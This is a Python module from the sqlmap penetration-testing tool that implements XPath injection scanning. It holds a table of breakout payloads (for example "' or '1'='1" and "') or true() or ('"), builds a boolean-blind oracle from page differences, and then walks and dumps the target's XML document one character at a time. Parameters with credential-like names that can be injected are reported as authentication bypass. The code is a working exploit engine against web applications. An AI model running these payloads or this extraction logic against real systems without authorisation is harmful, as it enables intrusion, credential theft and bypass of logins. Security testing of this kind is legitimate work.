#!/usr/bin/env python """ Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ import difflib import re import time from collections import namedtuple from lib.core.common import beep from lib.core.common import randomStr from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import logger from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import PLACE from lib.core.settings import UPPER_RATIO_BOUND from lib.core.settings import XPATH_CHAR_MAX from lib.core.settings import XPATH_CHAR_MIN from lib.core.settings import XPATH_ERROR_REGEX from lib.core.settings import XPATH_ERROR_SIGNATURES from lib.core.settings import XPATH_MAX_DEPTH from lib.core.settings import XPATH_MAX_LENGTH from lib.request.connect import Connect as Request from lib.utils.xrange import xrange SENTINEL = randomStr(length=10, lowercase=True) XPATH_PLACES = (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST) # Each detection breakout is paired with a false variant and an (optional) extraction # boundary. The boundary carries a prefix/suffix pair that wraps the extraction # predicate so the surrounding template stays syntactically valid. # # Breakouts are listed in detection-priority order: function-argument closers first, # then simple string, double-quoted, union wildcard, and bare numeric/boolean. 
_BREAKOUT_TABLE = ( # (breakout, false_variant, extraction_prefix, extraction_suffix ) # -- function-argument (closes paren + string) ------------------------------------------------------------ ("') or true() or ('", "') and false() and ('", "') or ", " or ('"), ("') or '1'='1' or ('", "') and '1'='2' and ('", "') or ", " or ('"), ("') or 1=1 or ('", "') and 1=2 and ('", "') or ", " or ('"), # -- single-quoted string (suffix absorbs trailing quote; predicate decisive when original value unmatched) ("' or '1'='1", "' and '1'='2", "' or ", " and '1'='1"), ("' or true() or '", "' and false() and '", "' or ", " and '1'='1"), ("' or 1=1 or '", "' and 1=2 and '", "' or ", " and '1'='1"), # -- AND context (single-quoted) ------------------------------------------------------------------------- ("' and '1'='1", "' and '1'='2", "' and ", " and '1'='1"), # -- double-quoted string (suffix absorbs trailing quote) ------------------------------------------------- ('" or "1"="1', '" and "1"="2', '" or ', ' and "1"="1'), ('" or true() or "', '" and false() and "', '" or ', ' and "1"="1'), # -- double-quoted function-argument --------------------------------------------------------------------- ('") or true() or ("', '") and false() and ("', '") or ', ' or ("'), # -- union wildcard (detection-only, no extraction) ------------------------------------------------------ ("']|//*|test['", None, None, None), # -- numeric / bare context (extraction uses 'and'; requires original value to not match anything) ---------- (" or 1=1", " and 1=2", " and ", ""), (" or true()", " and false()", " and ", ""), ) # Boundary: a verified injection boundary with an extraction prefix+suffix and an # extractable flag. Only extractable boundaries can drive tree-walking. 
Boundary = namedtuple("Boundary", ("prefix", "suffix", "extractable"))

# Convenience lookups built from _BREAKOUT_TABLE:
#   _BREAKOUT_FALSE_MAP  breakout -> paired false variant (None when the entry has none)
#   _BREAKOUT_BOUNDARY   breakout -> Boundary (None for detection-only entries)
#   _BREAKOUT_LIST       breakouts in table (detection-priority) order
_BREAKOUT_FALSE_MAP = {}
_BREAKOUT_BOUNDARY = {}
_BREAKOUT_LIST = []

for _entry in _BREAKOUT_TABLE:
    _bk, _fv, _pfx, _sfx = _entry
    _BREAKOUT_LIST.append(_bk)
    _BREAKOUT_FALSE_MAP[_bk] = _fv
    _BREAKOUT_BOUNDARY[_bk] = Boundary(_pfx, _sfx, True) if _pfx is not None else None

XPATH_BREAKOUT_PREFIXES = tuple(_BREAKOUT_LIST)

# One confirmed injection point; every field defaults to None
Slot = namedtuple("Slot", ("place", "parameter", "backend", "oracle", "template", "payload", "boundary"))
Slot.__new__.__defaults__ = (None, None, None, None, None, None, None)


def _ratio(first, second):
    """Return the SequenceMatcher quick_ratio() of two pages (None is treated as "")."""

    return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio()


def _delim(place):
    """Return the delimiter separating parameters inside `place`."""

    return (conf.cookieDel or ';') if place == PLACE.COOKIE else '&'


def _confParameters(place):
    """Return the raw parameter string stored in conf.parameters for `place`
    (an empty string when the place is absent or holds no value)."""

    try:
        raw = conf.parameters.get(place, "")
    except AttributeError:
        raw = conf.parameters[place] if place in conf.parameters else ""

    # Callers split the result, so never hand back None
    return raw or ""


def _originalValue(place, parameter):
    """Return the original value of `parameter`, read from the raw parameter
    string first and from conf.paramDict as a fallback ("" when unknown)."""

    for segment in _confParameters(place).split(_delim(place)):
        name, _, value = segment.partition('=')
        if name.strip() == parameter:
            return value

    return conf.paramDict.get(place, {}).get(parameter) or ""


def _replaceSegment(place, parameter, value):
    """Return the parameter string of `place` with `parameter` set to `value`.

    Only the first matching name=value segment of the raw string is replaced.
    When the raw string holds no such segment the string is rebuilt from
    conf.paramDict instead."""

    delimiter = _delim(place)
    retVal, replaced = [], False

    for part in _confParameters(place).split(delimiter):
        name, _, _ = part.partition('=')
        if not replaced and name.strip() == parameter:
            retVal.append("%s=%s" % (name, value))
            replaced = True
        else:
            retVal.append(part)

    if not replaced:
        retVal = []
        for name, oldValue in conf.paramDict.get(place, {}).items():
            retVal.append("%s=%s" % (name, value if name == parameter else oldValue))

    return delimiter.join(retVal)


def _send(place, parameter, value):
    """Issue a single HTTP request with the target parameter set to `value`.

    conf.parameters[place] is swapped for the duration of the request and put
    back afterwards (the key is removed again if it did not exist before).

    Returns the response page ("" for an empty body) or None when the request
    raised, so that callers can tell a failed probe from an empty page."""

    if conf.delay:
        time.sleep(conf.delay)

    hadPlace = place in conf.parameters
    oldParams = conf.parameters[place] if hadPlace else None
    conf.parameters[place] = _replaceSegment(place, parameter, value)

    try:
        if conf.verbose >= 3:
            logger.log(CUSTOM_LOGGING.PAYLOAD, "%s=%s" % (parameter, value))

        page, _, _ = Request.getPage(raise404=False, silent=True)
        return page or ""
    except Exception as ex:
        # Best-effort probe: log and report the failure as None instead of
        # aborting the whole scan
        logger.debug("XPath probe request failed: %s" % getUnicode(ex))
        return None
    finally:
        if hadPlace:
            conf.parameters[place] = oldParams
        elif place in conf.parameters:
            del conf.parameters[place]


def _isError(page):
    """Return True when `page` matches XPATH_ERROR_REGEX."""

    return bool(re.search(XPATH_ERROR_REGEX, getUnicode(page or "")))


def _backendFromError(page):
    """Return the back-end whose signature in XPATH_ERROR_SIGNATURES matches
    `page`, "Generic XPath" for an unattributed XPath error, or None."""

    page = getUnicode(page or "")

    for backend, regex in XPATH_ERROR_SIGNATURES:
        if re.search(regex, page):
            return backend

    return "Generic XPath" if _isError(page) else None


def _probeBackendByParserError(place, parameter):
    """Probe for XPath parser errors to obtain a backend hint.

    This is NOT authoritative detection -- only a boolean oracle confirms
    injection. Returns (backend, payload) or (None, None)."""

    original = _originalValue(place, parameter) or "x"
    normal = _send(place, parameter, original)

    # Without a usable, error-free baseline no probe below can yield a hint,
    # so do not spend requests on them
    if not normal or _isError(normal):
        return None, None

    for suffix in ("'", '"', "')", '")', "]", "|"):
        payload = original + suffix
        broken = _send(place, parameter, payload)

        if broken is None or _ratio(normal, broken) >= UPPER_RATIO_BOUND:
            continue

        backend = _backendFromError(broken)
        if backend:
            return backend, payload

    return None, None


def _boolean(truthy, falsy):
    """Return the reproducible true page when true/false probes diverge.

    `truthy` and `falsy` are zero-argument callables returning a page (or None
    on failure). Both true AND false pages must be independently reproducible;
    a failed or error page on either side yields None."""

    truePage = truthy()
    if truePage is None or _isError(truePage):
        return None

    truePage2 = truthy()
    if truePage2 is None or _ratio(truePage, truePage2) < UPPER_RATIO_BOUND:
        return None

    falsePage = falsy()
    if falsePage is None or _isError(falsePage):
        return None

    falsePage2 = falsy()
    if falsePage2 is None or _ratio(falsePage, falsePage2) < UPPER_RATIO_BOUND:
        return None

    if _ratio(truePage, falsePage) < UPPER_RATIO_BOUND:
        return truePage

    return None


def _makePayload(original, boundary, predicate):
    """Construct a payload by inserting `predicate` into the verified boundary."""

    return "%s%s%s%s" % (original, boundary.prefix, predicate, boundary.suffix or "")


def _detectBoolean(place, parameter):
    """Return (template, payload, boundary) for boolean-blind XPath injection.

    boundary is None for detection-only breakouts (wildcard, union).
    (None, None, None) is returned when no oracle could be established."""

    original = _originalValue(place, parameter) or ""

    for breakout in XPATH_BREAKOUT_PREFIXES:
        falseVariant = _BREAKOUT_FALSE_MAP.get(breakout)

        if not falseVariant:
            # Detection-only entry without a paired false variant (the union
            # wildcard): derive a structurally parallel one by swapping the
            # '//*' step for a random element name that is not expected to
            # exist, so that the entry is actually probed
            if "//*" not in breakout:
                continue
            falseVariant = breakout.replace("//*", "//%s" % SENTINEL)

        truePayload = original + breakout
        falsePayload = original + falseVariant

        template = _boolean(lambda p=truePayload: _send(place, parameter, p), lambda p=falsePayload: _send(place, parameter, p))
        if template:
            return template, truePayload, _BREAKOUT_BOUNDARY.get(breakout)

    # Wildcard: only useful for bool differentiation, not enumeration
    if original:
        template = _boolean(lambda: _send(place, parameter, "*"), lambda: _send(place, parameter, SENTINEL))
        if template:
            return template, "*", None

    return None, None, None


def _isPasswordParam(parameter):
    """Return True when the parameter name contains a credential-like keyword."""

    parameter = getUnicode(parameter or "").lower()
    return any(_ in parameter for _ in ("pass", "pwd", "secret", "pin", "cred", "key", "token", "auth"))


def _fingerprintByError(backend):
    """Map a backend hint onto the first signature name it contains (the hint
    itself is returned when nothing matches, None for an empty hint)."""

    if not backend:
        return None

    for name, _ in XPATH_ERROR_SIGNATURES:
        if name in backend:
            return name

    return backend


def _xpathQuote(s):
    """Quote a string for an XPath string literal, choosing the delimiter that
    requires no escaping. When both quotes appear, use concat()."""

    s = getUnicode(s)

    if "'" not in s:
        return "'%s'" % s

    if '"' not in s:
        return '"%s"' % s

    # both quote types present: use concat() with " as outer delimiter
    return "concat(%s)" % ", '\"', ".join('"%s"' % part for part in s.split('"'))


class _XPathPayloadBuilder(object):
    """Build XPath boolean predicates for blind tree-walking using the verified
    injection boundary from detection. Each method returns a complete payload."""

    def __init__(self, original, boundary):
        self.original = original or "x"
        self.boundary = boundary

    def _make(self, predicate):
        return _makePayload(self.original, self.boundary, predicate)

    def nameStartsWith(self, path, prefix):
        return self._make("starts-with(name(%s),%s)" % (path, _xpathQuote(prefix)))

    def nameLength(self, path, length):
        return self._make("string-length(name(%s))=%d" % (path, length))

    def childCount(self, path, count):
        return self._make("count(%s/*)>=%d" % (path, count))

    def attributeCount(self, path, count):
        return self._make("count(%s/@*)>=%d" % (path, count))

    def attributeNameStartsWith(self, path, index, prefix):
        return self._make("starts-with(name(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix)))

    def attributeValueStartsWith(self, path, index, prefix):
        return self._make("starts-with(string(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix)))

    def textStartsWith(self, path, prefix):
        return self._make("starts-with(string(%s),%s)" % (path, _xpathQuote(prefix)))


def _makeOracle(place, parameter, template):
    """Build an oracle from a verified true template.

    oracle(payload) is True when the response matches the template.
    oracle.extract(payload) returns True when the response is closer to the
    true template than to the false page. The template, false page and
    response cache are exposed as attributes of the returned callable."""

    cache = {}

    def request(payload):
        if payload in cache:
            return cache[payload]

        page = _send(place, parameter, payload)

        # A failed request (None) is not cached, so a transient failure does
        # not permanently poison the answer for this payload
        if page is not None:
            cache[payload] = page

        return page

    falsePage = request(SENTINEL)

    def oracle(payload):
        page = request(payload)
        if page is None or _isError(page):
            return False
        return _ratio(template, page) >= UPPER_RATIO_BOUND

    def extract(payload):
        page = request(payload)
        if page is None or _isError(page):
            return False

        trueRatio = _ratio(template, page)

        # An unambiguous match against the template is always accepted
        if trueRatio >= UPPER_RATIO_BOUND:
            return True

        # Without a false baseline the margin test below would accept nearly
        # any page, so only the strict match above counts
        if falsePage is None:
            return False

        # Otherwise require a clear separation from the false page
        # (minimum 5 %pt margin)
        return (trueRatio - _ratio(falsePage, page)) > 0.05

    oracle.extract = extract
    oracle.template = template
    oracle.falsePage = falsePage
    oracle.cache = cache

    return oracle


# Frequency-ordered charset for blind character extraction.
# Excludes characters that are XPath metacharacters or problematic in URL context.
_META_ORDS = set(ord(_) for _ in ("'", '"', '[', ']', '<', '>', '&', '/'))
_FREQ = (tuple(xrange(ord('a'), ord('z') + 1)) + tuple(xrange(ord('A'), ord('Z') + 1)) + tuple(xrange(ord('0'), ord('9') + 1)) + tuple(ord(_) for _ in "@._-+ "))
_CHARSET = []

# Preferred (frequent) characters first ...
for _ in _FREQ:
    if XPATH_CHAR_MIN <= _ <= XPATH_CHAR_MAX and _ not in _META_ORDS and _ not in _CHARSET:
        _CHARSET.append(_)

# ... then whatever remains of the configured range
for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1):
    if _ not in _META_ORDS and _ not in _CHARSET:
        _CHARSET.append(_)


def _inferValue(oracle, builder, path, getter, maxLen=XPATH_MAX_LENGTH):
    """Blindly infer a string value at `path` using `getter(builder, path, prefix)`.

    The value is grown one character at a time; `getter` must build a payload
    that is true when the target starts with the given prefix.
    Returns the recovered value or None."""

    value = ""
    probes = 0

    for _ in xrange(maxLen):
        found = False

        for cp in _CHARSET:
            candidate = value + chr(cp)
            probes += 1
            if oracle.extract(getter(builder, path, candidate)):
                value = candidate
                found = True
                break

        if not found:
            break

        # NOTE(review): inference stops at the first space, so a value with an
        # inner space is cut at that point -- confirm this is intended
        if value.endswith(" "):
            value = value.rstrip()
            break

    logger.debug("XPath blind inference: %d probes (length=%d)" % (probes, len(value)))

    return value if value else None


def _inferCount(oracle, builder, path, countFn, maxCount=128):
    """Binary search for a count value using predicate 'count(...)>=N'.

    Returns 0 when even '>=1' is false; the result is capped at `maxCount`."""

    if not oracle.extract(countFn(builder, path, 1)):
        return 0

    lo, hi = 1, maxCount

    while lo < hi:
        # Upper midpoint, as a true answer keeps `mid` itself in range
        mid = (lo + hi + 1) // 2
        if oracle.extract(countFn(builder, path, mid)):
            lo = mid
        else:
            hi = mid - 1

    return lo


def _walkTree(oracle, builder, path="/*", depth=0):
    """Recursively walk the XML tree from a given XPath expression.

    Returns a dict: {name, path, children, attributes, text} or None when the
    depth limit is exceeded or no element name could be inferred."""

    if depth > XPATH_MAX_DEPTH:
        return None

    name = _inferValue(oracle, builder, path, lambda b, p, prefix: b.nameStartsWith(p, prefix))
    if not name:
        return None

    logger.info("discovered element: '%s'" % name)

    childCount = _inferCount(oracle, builder, path, lambda b, p, c: b.childCount(p, c), maxCount=32)
    attrCount = _inferCount(oracle, builder, path, lambda b, p, c: b.attributeCount(p, c), maxCount=16)

    attributes = []
    for i in xrange(1, attrCount + 1):
        # `idx=i` binds the current index (avoids the late-binding closure trap)
        attrName = _inferValue(oracle, builder, path, lambda b, p, prefix, idx=i: b.attributeNameStartsWith(p, idx, prefix))
        if not attrName:
            continue

        attrValue = _inferValue(oracle, builder, path, lambda b, p, prefix, idx=i: b.attributeValueStartsWith(p, idx, prefix))
        attributes.append({"name": attrName, "value": attrValue or ""})
        logger.info(" attribute: @%s='%s'" % (attrName, attrValue or ""))

    # Text is only extracted for leaf elements
    text = None
    if childCount == 0:
        text = _inferValue(oracle, builder, path, lambda b, p, prefix: b.textStartsWith(p, prefix))

    children = []
    for i in xrange(1, childCount + 1):
        childPath = "%s/*[%d]" % (path, i)
        child = _walkTree(oracle, builder, childPath, depth + 1)
        if child:
            children.append(child)

    return {
        "name": name,
        "path": path,
        "children": children,
        "attributes": attributes,
        "text": text,
    }


def _treeToTable(node):
    """Flatten a tree node to (columns, rows) for grid output.

    One row is produced per attribute and per non-empty text value, in
    document order. Elements carrying neither produce no row of their own
    (the previous implementation appended such rows and then filtered them
    out again; the resulting table is unchanged)."""

    columns = ["Path", "Element", "Attribute", "Value"]
    rows = []

    def _flatten(n):
        path = n["path"]

        for attr in n.get("attributes", []):
            rows.append([path, n["name"], "@" + attr["name"], attr["value"]])

        if n.get("text"):
            rows.append([path, n["name"], "text()", n["text"]])

        for child in n.get("children", []):
            _flatten(child)

    _flatten(node)

    return columns, rows


def _grid(columns, rows):
    """Render `columns` and `rows` as an ASCII table and return it as a string.

    Every column is as wide as its widest cell; cells missing from a short
    row are rendered empty."""

    columns = [getUnicode(_) for _ in columns]
    rows = [[getUnicode(_) for _ in row] for row in rows]

    widths = []
    for index, column in enumerate(columns):
        width = len(column)
        for row in rows:
            if index < len(row):
                width = max(width, len(row[index]))
        widths.append(width)

    separator = "+-" + "-+-".join("-" * _ for _ in widths) + "-+"

    def line(cells):
        return "| " + " | ".join((cells[index] if index < len(cells) else "").ljust(widths[index]) for index in xrange(len(columns))) + " |"

    return "\n".join([separator, line(columns), separator] + [line(row) for row in rows] + [separator])


def _dumpTable(title, columns, rows):
    """Send a titled grid to the dumper; nothing is emitted for an empty table."""

    if rows:
        conf.dumper.singleString("%s:\n%s" % (title, _grid(columns, rows)))


def xpathScan():
    """Entry point for '--xpath': detect XPath injection in the request
    parameters and, for the first parameter with an extractable boundary,
    blindly walk and dump the reachable XML document tree."""

    global SENTINEL

    # Fresh sentinel per scan
    SENTINEL = randomStr(length=10, lowercase=True)

    infoMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP "
    infoMsg += "parameters and walks the reachable XML document tree. SQL enumeration "
    infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
    logger.info(infoMsg)

    if not conf.paramDict:
        logger.error("no request parameters to test (use --data, GET params, or similar)")
        return

    tested = found = 0
    slots = []

    for place in (_ for _ in XPATH_PLACES if _ in conf.paramDict):
        for parameter in list(conf.paramDict[place].keys()):
            if conf.testParameter and parameter not in conf.testParameter:
                continue

            tested += 1
            logger.info("testing XPath injection on %s parameter '%s'" % (place, parameter))

            # Phase 1: Probe the XPath parser for a backend hint
            backendHint, _ = _probeBackendByParserError(place, parameter)
            if backendHint:
                backendHint = _fingerprintByError(backendHint)

            # Phase 2: Establish a boolean oracle (authoritative)
            template, payload, boundary = _detectBoolean(place, parameter)

            if not template:
                if backendHint:
                    logger.info("%s parameter '%s' reaches an XPath parser (back-end: '%s'), but no exploitable boolean oracle was established" % (place, parameter, backendHint))
                continue

            found += 1

            if boundary and boundary.extractable:
                backend = backendHint or "Generic XPath"
                logger.info("%s parameter '%s' is vulnerable to XPath injection (back-end: '%s')" % (place, parameter, backend))

                if conf.beep:
                    beep()

                oracle = _makeOracle(place, parameter, template)
                slots.append(Slot(place=place, parameter=parameter, backend=backend, oracle=oracle, template=template, payload=payload, boundary=boundary))
                continue

            # Detection-only: boolean differentiation confirmed but no extraction boundary.
            # Report as auth bypass on credential fields; log generically otherwise.
            if _isPasswordParam(parameter):
                title = "XPath auth bypass"
                logger.info("%s parameter '%s' allows XPath auth bypass (boolean differentiation confirmed)" % (place, parameter))
            else:
                title = "XPath boolean-based blind (detection-only)"
                logger.info("%s parameter '%s' is vulnerable to XPath injection (detection-only, back-end: '%s')" % (place, parameter, backendHint or "Generic XPath"))

            if conf.beep:
                beep()

            conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (parameter, place, title, parameter, payload))

    if not slots:
        if found:
            logger.info("XPath injection confirmed (detection-only, no extractable boundary established)")
            logger.info("XPath scan complete")
            return

        if tested:
            warnMsg = "no parameter appears to be injectable via XPath injection (%d tested)" % tested
        else:
            warnMsg = "no parameters found to test for XPath injection"
        logger.warning(warnMsg)
        return

    # Select the first oracle-bearing slot with an extractable boundary for tree-walking
    slot = next((_ for _ in slots if _.oracle and _.boundary and _.boundary.extractable), None)
    if not slot:
        logger.info("XPath scan complete")
        return

    original = _originalValue(slot.place, slot.parameter) or "x"

    # OR-style boundaries are always-true if the original branch matches, so use a
    # sentinel that is not expected to appear as a field value. AND-style
    # boundaries need the original branch to match; keep the original there.
    if " or " in slot.boundary.prefix:
        base = SENTINEL
    else:
        base = original

    builder = _XPathPayloadBuilder(base, slot.boundary)
    oracle = slot.oracle

    # Refine backend fingerprint if generic
    if not slot.backend or slot.backend == "Generic XPath":
        backend = _backendFromError(oracle.template)
        if backend:
            backend = _fingerprintByError(backend)
        if backend:
            logger.info("identified back-end: '%s'" % backend)
            slot = slot._replace(backend=backend)

    title = "XPath boolean-based blind"
    conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (slot.parameter, slot.place, title, slot.parameter, slot.payload))

    # Blind XML tree-walking (attempted document-root traversal)
    logger.info("walking XML document tree (depth limit: %d)" % XPATH_MAX_DEPTH)
    root = _walkTree(oracle, builder)

    if root:
        columns, rows = _treeToTable(root)
        logger.info("extracted %d node(s) from XML tree" % (len(rows)))
        _dumpTable("XPath: %s parameter '%s' XML tree" % (slot.place, slot.parameter), columns, rows)
    else:
        warnMsg = "XPath injection is confirmed but the XML tree could not be walked. "
        warnMsg += "This may indicate a restricted XPath context (subtree, scalar, or predicate-only)"
        logger.warning(warnMsg)

    logger.info("XPath scan complete")